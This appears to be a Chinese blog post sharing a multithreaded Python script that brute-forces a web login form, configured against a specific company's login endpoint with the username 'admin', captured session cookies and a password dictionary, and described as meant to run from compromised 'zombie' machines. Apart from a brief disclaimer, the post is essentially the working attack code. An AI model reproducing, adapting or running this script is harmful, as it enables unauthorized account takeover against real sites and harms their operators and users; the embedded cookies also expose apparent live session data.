python web密码爆破脚本

声明:工具仅用于技术交流,请勿违法
如下

# -*- coding: utf-8 -*-
'''
肉机爆破密码脚本
由于是面向肉机的脚本,所以牺牲了一些速度,增加了准确性
程序挂肉机上然后去睡觉等结果嘛
从这里复制了代码:https://blog.csdn.net/tempulcc/article/details/108323499
对于没pip的机器,可把模块打包成zip,上传的机器上用unzip解压
需要自行配置请求数据包,数据包信息位于:brutepwd.brute
'''
import threading
import queue
import sys,os
import requests
import time
try:
    color=0
    from core.color import *
    color=1
except:
    pass
print('it has started,please wait...')
time1=time.time()

unames=r'' #用户名字典位置
passwords=r"merged.txt" #密码字典位置
thread_num=100 #线程数
timeouts=100 #对于发送失败的数据包重新尝试几次
#your_email='' #你的邮箱地址
pswd_err_content=68 #密码错误时返回包的len

def send_email(value):
    global time1
    time2=time.time()
    with open('satori_s_password_HereHereHereHereHere.txt','a') as f:
        f.write(value + '\n')
        f.write('time:'+ str(time2-time1) + '\n')

class brutepwd(threading.Thread):
    def __init__(self,q,ss):
        threading.Thread.__init__(self)
        self.__queue=q
        self.__session=ss

    def run(self):
        while not self.__queue.empty():
            pwd=self.__queue.get()
            ss=self.__session
            self.brute(pwd,ss)

    def brute(self,pwd,session,uname='admin'):
        print('\r'+pwd,end='\r')
        global pswd_err_content
        timeout_bool=True
        res=None
        ###数据包信息请自行配置👇
        url = "https://wx.zhengzhong.cn/zz/logon/postLogin.do"
        headers = {
            "Host": "wx.zhengzhong.cn",
            "Cookie": "JSESSIONID=5461E58745BECFDC8CBF95AA3C801792; session=eyJzeXN0ZW1UeXBlIjoiIn0.ZiHpDw.NvbN9KtTyig06Q6sX3FuKGthQG0; sensorsdata2015jssdkcrossZQSensorsObj=%7B%22distinct_id%22%3A%2218efc1ce44647f-034c33f8fa07b9c-4c657b58-2073600-18efc1ce44710f2%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_landing_page%22%3A%22http%3A%2F%2Fwww.zhengzhong.cn%2F%22%7D%2C%22%24device_id%22%3A%2218efc1ce44647f-034c33f8fa07b9c-4c657b58-2073600-18efc1ce44710f2%22%7D",
            "Content-Length": "35",
            "Sec-Ch-Ua": "\"Chromium\";v=\"124\", \"Microsoft Edge\";v=\"124\", \"Not-A.Brand\";v=\"99\"",
            "Accept": "*/*",
            "Content-Type": "application/json",
            "X-Requested-With": "XMLHttpRequest",
            "Sec-Ch-Ua-Mobile": "?0",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
            "Sec-Ch-Ua-Platform": "\"Windows\"",
            "Origin": "https://wx.zhengzhong.cn",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-Mode": "cors",
            "Sec-Fetch-Dest": "empty",
            "Referer": "https://wx.zhengzhong.cn/zz/system/login",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
            "Priority": "u=1, i",
            "Connection": "close"
        }
        data = {"name":uname,"password":{pwd}}
        ###数据包信息👆
        fre=0
        while timeout_bool:
            if fre < timeouts:
                try:
                    res=session.post(url=url,headers=headers,data=data,timeout=3)
                    timeout_bool=False
                except:
                    fre+=1
                    continue
            else:
                break
        #print(len(res.content),pwd,fre)#查看content的len
        try:
            if len(res.content)!=pswd_err_content:
                if color==1:
                    print (TOgreen(pwd))
                else:
                    print (pwd)
                send_email(pwd)
        except:
            print('\n超时,连接释放:\n'+pwd)



def main():
    threads=[]
    global thread_num
    thread_num=thread_num
    q=queue.Queue()
    ss = requests.session()

    with open(passwords, 'r',encoding='utf-8') as f:
        password = f.readlines()
        for pwd in password:
            pwd = pwd.strip('\n')
            q.put(pwd)
  
    for t in range(thread_num):
        t=brutepwd(q=q,ss=ss)
        threads.append(t)

    for i in threads:
        i.start()

    for i in threads:
        i.join()
    send_email('-------------------------------Down: '+str(time.time()))

main()